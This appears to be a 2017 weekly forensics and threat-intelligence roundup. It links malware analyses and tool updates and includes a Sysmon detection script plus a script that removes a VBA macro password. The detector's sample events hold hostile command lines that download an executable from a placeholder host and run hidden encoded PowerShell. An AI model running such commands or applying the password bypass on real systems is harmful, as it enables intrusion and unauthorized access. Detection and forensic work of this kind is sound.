Week 14 – 2017

If you’d like to vote this site for the Forensic 4cast blog of the year, that would be greatly appreciated 🙂
2017 Forensic 4:cast Awards – Voting



  • Irfan Shakeel at Alienvault shares his tips for preparing an effective threat intelligence team. These tips include “establish an intelligence priorities framework, incorporate and consolidate intelligence sources, mapping intelligence collection, specialized threat intelligence experts, [and] adapting finished products to the audience”.
    How to Prepare an Effective Threat Intelligence Team



  • Adrian Nish and Tom Rowles at the BAE Systems Threat Research blog share their research into Operation Cloud Hopper, the campaign linked to APT10.
    APT10 – Operation Cloud Hopper

  • Eric Merritt at Carbon Black examines “a compiled AutoIT script that pretends to be an installer for Photoshop CS6 portable.” This post walks through “the techniques used by this malware to increase the difficulty of discovering the final payload and the methods used to maintain persistence on the system, [and looks at] the tools, tactics, and techniques for reverse engineering this type of AutoIT script.”
    Latest Malware Uses Compiled AutoIT Script to Masquerade As Photoshop CS6 Installer

  • Amanda Rousseau at Endgame provides some background to the REM-101 workshop that she shared last week.
    Reverse Engineering Malware 101 Workshop

  • Roland Dela Paz at Forcepoint analyses a maldoc that distributes a variant of the Philadelphia ransomware.
    Off-the-shelf Ransomware Used to Target the Healthcare Sector

  • There were a few posts by Fortinet this week
    • Kai Lu presents “a case study on how to repair a DEX file in which some key methods are erased with NOPs and decrypted dynamically when ready to be executed”
      How to repair a DEX file, in which some key methods are erased with NOPs
    • Jasper Manuel and Artem Semenchenko analyse a sample of malware dubbed BADNEWS, “which is actively being used in the MONSOON APT campaign”. The first post looks at the backdoor, and the second attempts to attribute the sample.

  • Shusei Tomonaga at JPCERT/CC introduces details of the RedLeaves malware and the results of their “analysis including its relation to PlugX, and a tool which is used as the base of this malware”
    RedLeaves – Malware Based on Open Source RAT

  • Hasherezade at Malwarebytes continues her analysis of “a Diamond Fox bot delivered by the Nebula Exploit Kit”. This post takes a “deeper look into the code and analyze the bot’s features and code design.”
    Diamond Fox – part 2: let’s dive in the code

  • Andy at Malware Soup shares some “observations on detecting malicious Microsoft Office documents using Sysmon”. The first post covers detecting “documents leveraging malicious macros to launch a command shell – either cmd.exe or PowerShell” and “documents with malicious scripts embedded as objects”. The second post covers detecting “documents that use malicious macros – or possibly leveraging an exploited vulnerability – to execute shellcode”.
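The parent/child relationship Andy's posts key on (an Office application as the parent of cmd.exe or PowerShell) is easy to check once Sysmon Event ID 1 records are in hand. The Python below is an added example written for this roundup, not code from Malware Soup; the four Sysmon events are constructed, the `198.51.100.7` address and base64 fragment are placeholders, and the script-host children (wscript.exe, cscript.exe) generalise the post's cmd.exe/PowerShell case.

```python
"""Flag Office applications spawning command shells from Sysmon Event ID 1 records."""
import ntpath
import xml.etree.ElementTree as ET
from typing import Dict, List

# Sysmon events use the standard Windows event XML namespace.
NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}

# Parents that should not be launching shells, and the children we care about.
# cmd.exe and powershell.exe are what the post discusses; the script hosts are
# an assumed generalisation of the same parent/child pattern.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELL_CHILDREN = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe"}

# Constructed Sysmon events (raw strings so the Windows paths survive intact).
SAMPLE_EVENTS = [
    # 1. Word macro spawning cmd.exe to pull a second stage
    r"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><Provider Name="Microsoft-Windows-Sysmon"/><EventID>1</EventID></System>
  <EventData>
    <Data Name="Image">C:\Windows\System32\cmd.exe</Data>
    <Data Name="CommandLine">cmd.exe /c bitsadmin /transfer j http://198.51.100.7/a.exe %TEMP%\a.exe</Data>
    <Data Name="ParentImage">C:\Program Files\Microsoft Office\Office15\WINWORD.EXE</Data>
  </EventData>
</Event>""",
    # 2. Excel macro spawning an encoded PowerShell command
    r"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><Provider Name="Microsoft-Windows-Sysmon"/><EventID>1</EventID></System>
  <EventData>
    <Data Name="Image">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
    <Data Name="CommandLine">powershell.exe -nop -w hidden -enc SQBFAFgA</Data>
    <Data Name="ParentImage">C:\Program Files\Microsoft Office\Office15\EXCEL.EXE</Data>
  </EventData>
</Event>""",
    # 3. Benign: a user opening a prompt from Explorer
    r"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><Provider Name="Microsoft-Windows-Sysmon"/><EventID>1</EventID></System>
  <EventData>
    <Data Name="Image">C:\Windows\System32\cmd.exe</Data>
    <Data Name="CommandLine">"C:\Windows\System32\cmd.exe"</Data>
    <Data Name="ParentImage">C:\Windows\explorer.exe</Data>
  </EventData>
</Event>""",
    # 4. Not a process-creation event at all (Event ID 3, network connect)
    r"""<Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
  <System><Provider Name="Microsoft-Windows-Sysmon"/><EventID>3</EventID></System>
  <EventData>
    <Data Name="Image">C:\Program Files\Microsoft Office\Office15\WINWORD.EXE</Data>
    <Data Name="DestinationIp">198.51.100.7</Data>
  </EventData>
</Event>""",
]


def parse_event(xml_text: str) -> Dict[str, str]:
    """Return the EventID plus every EventData <Data Name=...> value as a flat dict."""
    root = ET.fromstring(xml_text)
    fields = {"EventID": root.findtext("e:System/e:EventID", default="", namespaces=NS)}
    for data in root.findall("e:EventData/e:Data", NS):
        fields[data.get("Name", "")] = data.text or ""
    return fields


def basename_lower(path: str) -> str:
    """Case-insensitive file name of a Windows path (Sysmon logs full paths)."""
    return ntpath.basename(path).lower()


def is_office_spawned_shell(ev: Dict[str, str]) -> bool:
    """True for a process-creation event whose parent is Office and child is a shell."""
    if ev.get("EventID") != "1":
        return False
    return (basename_lower(ev.get("ParentImage", "")) in OFFICE_PARENTS
            and basename_lower(ev.get("Image", "")) in SHELL_CHILDREN)


def detect(events: List[str]) -> List[Dict[str, str]]:
    """Run the check over raw event XML and return one alert per hit, in order."""
    alerts = []
    for xml_text in events:
        ev = parse_event(xml_text)
        if is_office_spawned_shell(ev):
            alerts.append({"parent": basename_lower(ev["ParentImage"]),
                           "child": basename_lower(ev["Image"]),
                           "cmdline": ev.get("CommandLine", "")})
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_EVENTS):
        print(f"ALERT {a['parent']} -> {a['child']}: {a['cmdline']}")
```

Matching on `ParentImage` rather than on the child's command line is what makes this robust to obfuscated PowerShell: the encoded payload in event 2 is never inspected, yet it is still caught. The same condition can be pushed into the Sysmon configuration itself (a `ProcessCreate` include rule on `ParentImage` with `condition="end with"`), which keeps the volume of Event ID 1 records manageable on a busy host.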

  • Michel Coene at NVISO Labs examines the internal metadata of the LNK file that was extracted in a previous post. Michel also shared this video created by “Didier Stevens … on how to extract the .LNK file from the Word document and analyze it with lnkanalyzer.exe”
    Tracking threat actors through .LNK files

  • There were a few posts on the Palo Alto Networks blog this week
    • Tomer Bar and Tom Lancaster have shared the “joint research between Unit 42 and Eyal Sela [at] ClearSky Cyber Security”. This research looks at two new Windows malware families named “KASPERAGENT and MICROPSIA” and “two families of Google Android malware … SECUREUPDATE and VAMP”.
      Targeted Attacks in the Middle East Using KASPERAGENT and MICROPSIA
    • Claud Xiao, Cong Zheng and Yanhui Jia examine the Amnesia botnet, which is “a new variant of the IoT/Linux botnet ‘Tsunami’”.
      New IoT/Linux Malware Targets DVRs, Forms Botnet
    • Anthony Kasza and Micah Yates analyse a maldoc “with recent compilation and distribution timestamps that has code, infrastructure, and themes overlapping with threats described previously in the Operation Blockbuster report, written by researchers at Novetta.” They were then able to expand their analysis by analysing other maldocs from the same attackers.
      The Blockbuster Sequel

  • The guys at Securelist compile information about the Lazarus group and its effect on the financial industry.
    Lazarus Under The Hood

  • Amanda Lemmers at Cisco explains the benefits of using NetFlow and packet capture data in concert. This “allows investigators to be quicker, more agile, and more responsive to threat activity.”
    Harnessing the Power of NetFlow and Packet Analysis

  • Warren Mercer and Paul Rascagneres at Cisco’s Talos blog analyse the attack chain used to distribute the ROKRAT malware.
    Introducing ROKRAT

  • Melissa at Sketchymoose’s Blog shows how to edit a maldoc that has locked the macros behind a password. It turns out that modifying one specific character with a hex editor turns off the password requirement.
    Dealing with Macros: Step One – Password Workaround!
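The single-character edit Melissa describes is, in its commonly documented form, renaming the `DPB` key in the VBA `PROJECT` stream to `DPx`; the summary above does not say which byte her post changes, so treat that mapping as an assumption. The Python below is an added example written for this roundup, not code from her post. The `PROJECT` stream is a constructed, trimmed sample with placeholder hex values, and the `patch_ole_file` helper assumes the `olefile` library's `OleFileIO(..., write_mode=True)` and `write_stream()` (which requires the replacement to be the same length, which the rename guarantees).

```python
"""Neutralise a VBA project password by renaming the DPB key in the PROJECT stream."""
import re
from typing import Dict

# Constructed, trimmed PROJECT stream of the kind found at 'Macros/PROJECT' in a
# legacy .doc (or inside word/vbaProject.bin for a .docm). Hex blobs are placeholders.
SAMPLE_PROJECT = (
    b'ID="{00000000-0000-0000-0000-000000000000}"\r\n'
    b'Document=ThisDocument/&H00000000\r\n'
    b'Module=Module1\r\n'
    b'Name="Project"\r\n'
    b'HelpContextID="0"\r\n'
    b'VersionCompatible32="393222000"\r\n'
    b'CMG="0A0848D4D9D4D9D4D9D4"\r\n'
    b'DPB="6C6E2E4A4E89AF9CAF9CAF9C"\r\n'
    b'GC="CECCE0D1E1D1E1D1E1"\r\n'
    b'\r\n'
    b'[Host Extender Info]\r\n'
    b'&H00000001={00000000-0000-0000-0000-000000000000};VBE;&H00000000\r\n'
)

# Only a DPB= key at the start of a line; the stream may use CRLF or LF endings.
_DPB_LINE = re.compile(rb"^DPB=", re.MULTILINE)


def disable_project_password(stream: bytes) -> bytes:
    """Rename DPB= to DPx= (one byte, same length) so the VBA IDE no longer asks for
    the password. Raises if there is nothing to patch."""
    patched, count = _DPB_LINE.subn(b"DPx=", stream, count=1)
    if count == 0:
        raise ValueError("no DPB= key: project not password-protected or already patched")
    # Same length is what lets the stream be written back in place in the OLE container.
    assert len(patched) == len(stream)
    return patched


def project_keys(stream: bytes) -> Dict[str, str]:
    """Parse the key=value header lines, stopping at the first [section] header."""
    keys: Dict[str, str] = {}
    for line in stream.splitlines():
        if line.startswith(b"["):
            break
        if b"=" in line:
            key, value = line.split(b"=", 1)
            keys[key.decode("ascii", "replace")] = value.decode("ascii", "replace")
    return keys


def patch_ole_file(path: str, stream_name: str = "Macros/PROJECT") -> None:
    """Apply the rename in place to a real OLE file. Not exercised by the demo;
    depends on the third-party olefile package (assumed API: write_mode/write_stream)."""
    import olefile  # pip install olefile
    ole = olefile.OleFileIO(path, write_mode=True)
    try:
        data = ole.openstream(stream_name).read()
        ole.write_stream(stream_name, disable_project_password(data))
    finally:
        ole.close()


if __name__ == "__main__":
    before = project_keys(SAMPLE_PROJECT)
    after = project_keys(disable_project_password(SAMPLE_PROJECT))
    print("before:", sorted(before))
    print("after: ", sorted(after))
```

Two caveats for the examiner. First, a byte-level search-and-replace on the whole document file is only safe when the `PROJECT` stream happens to be stored contiguously; going through the OLE container, as `patch_ole_file` does, avoids that gamble. Second, the password protects nothing but the VBA editor view: the macro source is stored compressed, not encrypted, so static extraction with tools such as olevba works on the unmodified file, and this edit is only needed when you want to step through the code in Office itself.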

  • The guys at Threat Geek share an article by Fidelis Cybersecurity on a campaign that is most probably run by the APT10 (aka Stone Panda) threat actors. The campaign distributes the “reconnaissance malware known as the ‘Scanbox’ framework”.
    Operation TradeSecret: Cyber Espionage at the Heart of Global Trade

  • There were a couple of posts on FireEye’s Threat Research blog this week



  • AccessData have updated FTK and AD Lab to version 6.2 with a host of new additions, improvements, and bug fixes.

  • Cyber Triage have released Cyber Triage Lite, and this post shows the differences between the Lite and full versions, as well as a comparison with the Sysinternals tools.
    Get Free Endpoint Visibility

  • DVR Examiner version 1.31.0 has just been released, adding support for the Mirage_HiSi and UWARE_264 filesystems, “adjusted scanning for the FE family (including DHFS_41, DHPT, zlav, HUAYI, WFS, etc) to work around corrupted index entries, [and] updating API access for downloading native players and updating the license database”.

  • Phil Harvey updated ExifTool to version 10.48 (development release), adding new tags and values.
    ExifTool 10.48

  • Matt Shannon at F-Response has announced the release of F-Response v7 (version The tool is currently in Beta and is “initially only … available for F-Response Field Kit, Consultant, Consultant+Covert, and Enterprise customers.”
    Better late than never, F-Response v7

  • GetData have updated Forensic Explorer to v3.9.8.6414, improving bookmarking speed and adding the partition to the export file path when exporting files, as well as other minor updates.
    5 Apr 2017 – v3.9.8.6414

  • Guidance Software have announced an update to Tableau Password Recovery, now at version 1.3. The update adds “full support for TrueCrypt files.”
    Guidance Software And Passware Announce Enhanced Password Recovery Solutions

  • Micro Systemation have updated XAMN Spotlight to version 2.0 and XRY to version 7.3. The update to XRY adds support for new devices, apps, and operating system versions, as well as “Better location data reporting, [and an] Android Chip-off profile”.

  • Sanderson Forensics released version 3.2.5 of the Forensic Browser for SQLite, fixing a couple of bugs.
    New release 3.2.5

  • There was a bit of movement at Evimetry this week with the release of the v3.0.0-RC5 release candidate and the free Community Edition. The release candidate fixed a variety of bugs and added new features including “Remote physical memory acquisition for Windows, MacOS and Linux”, “Improved speed on striped images”, and updated AFF4 support. “With the Community Licenced Evimetry Controller, you can create Linear AFF4 Images on your Windows based analysis system, verify the integrity of AFF4 images, and convert between AFF4, E01/EWF and Raw images. You can also mount AFF4 images as virtual disks and analyse with your preferred forensic tools”. In my opinion, offering a free tool is a must-have if the community is to adopt the AFF4 standard.

  • Bradley Schatz at Schatz Forensics/Evimetry has announced the availability of “both a set of patches to the Sleuth Kit and an open source C/C++ implementation for reading AFF4 Standard v1.0 disk images”.
    Sleuth Kit support for the AFF4 Standard v1.0 Released

  • Sumuri have released a new Mac imaging tool, which allows examiners to “image all Intel® Based Macs, including the 2016 MacBook Pro with Touch Bar, [and] supports Apple FileVault, Fusion and Core Storage volumes”.
    Recon Imager

  • X-Ways Forensics 19.2 SR-1 was released with a few bug fixes, as well as support for “metadata extraction from certain irregular DOCX files” and “improved internal handling of FlexFilters”.
    X-Ways Forensics 19.2 SR-1


  • And in self-promotion news, I submitted a talk to the SANS DFIR Summit and unfortunately was rejected; however, they offered to let me present my talk as a webcast instead. The talk I submitted was about parsing the URLs that Google generates when performing searches. I’ve found a few interesting artefacts with regards to timestamps and user activity. The talk will be at 11 AM EDT/3 PM GMT on the 11th May (and lucky me, 1 AM AEST on the 12th). You can register at the link below.

And that’s all for Week 14! If you think I’ve missed something, or want me to cover something specifically hit me up through the contact page or on the social pipes!

